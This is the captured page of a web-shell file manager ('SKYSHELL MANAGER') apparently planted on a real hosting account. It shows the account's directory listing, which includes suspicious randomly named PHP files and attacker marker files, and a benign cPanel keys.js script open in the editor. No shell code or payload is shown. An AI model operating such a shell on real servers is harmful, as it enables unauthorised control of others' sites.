📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: keys.js
(function() { "use strict"; /* -----------------------------------------------*/ /* Explicit JSHINT RULES */ /* -----------------------------------------------*/ /* jshint sub:true */ /* global CPANEL:true, YAHOO:true, window:true */ /* -----------------------------------------------*/ // Shortcuts var DOM = YAHOO.util.Dom; var EVENT = YAHOO.util.Event; var SSL = CPANEL.Applications.SSL; // Access page globals var PAGE = window.PAGE; var MINIMUM_MODULUS_LENGTH = CPANEL.ssl.DEFAULT_KEY_SIZE; /** * This module contains all the code necessary to add the interactions * for the List/Generate Private Key (KEYS) form. * @module PAGE.Modules.GenerateKEYModule */ /** * Initialize the page validation * @method initialize */ var initialize = function() { /** * Sets focus to the key size fields unless there is only one * valid key size, in which case, it moves on to the name field. * @method generate_set_focus */ var generate_set_focus = function() { var keySizeEl = DOM.get("keysize"); if (keySizeEl && keySizeEl.options.length >= 1 && keySizeEl.options[0].value !== "") { // Focus on keys if there are choices keySizeEl.focus(); } else { // Otherwise, start at name. DOM.get("gen-fname").focus(); } }; /** * Sets focus to the first link in the lister if available. * @method lister_set_focus */ var lister_set_focus = function() { var firstAction = DOM.get("view-key-0"); if (firstAction) { firstAction.focus(); } }; if (!window.location.hash) { if (!PAGE.properties.has_keys_data) { generate_set_focus(); } else { lister_set_focus(); } } EVENT.on(["upload-link", "upload2-link"], "click", function(e) { EVENT.preventDefault(e); var windowScroll = new CPANEL.animate.WindowScroll("upload"); windowScroll.onComplete.subscribe(function() { var field = DOM.get("key"); if (field) { field.focus(); } }); windowScroll.animate(); return false; }); EVENT.on(["generate-link", "generate2-link"], "click", function(e) { EVENT.preventDefault(e); var windowScroll = new CPANEL.animate.WindowScroll("generate"); windowScroll.onComplete.subscribe(generate_set_focus); windowScroll.animate(); return false; }); EVENT.on(["list-link", "list2-link"], "click", function(e) { EVENT.preventDefault(e); var windowScroll = new CPANEL.animate.WindowScroll("top"); windowScroll.onComplete.subscribe(lister_set_focus); windowScroll.animate(); return false; }); var search_warning = { "#ssltable .modulus-critical td.size-column": LOCALE.maketext("A key that does not use at least [numf,_1]-bit encryption does not provide adequate security.", MINIMUM_MODULUS_LENGTH) }; for (var search in search_warning) { var els = CPANEL.Y.all(search); for (var e = els.length - 1; e >= 0; e--) { var cell = els[e]; new CPANEL.widgets.Touch_Tooltip({ context: CPANEL.Y(cell).one("img"), container: cell, text: search_warning[search] }); } } // Setup the single submit lockouts EVENT.on("uploadkey", "submit", handle_single_submission_lockout); EVENT.on("uploadkey2", "submit", handle_single_submission_lockout); EVENT.on("genkey", "submit", handle_single_submission_lockout); }; // Register startup events. YAHOO.util.Event.onDOMReady(initialize); }());
Save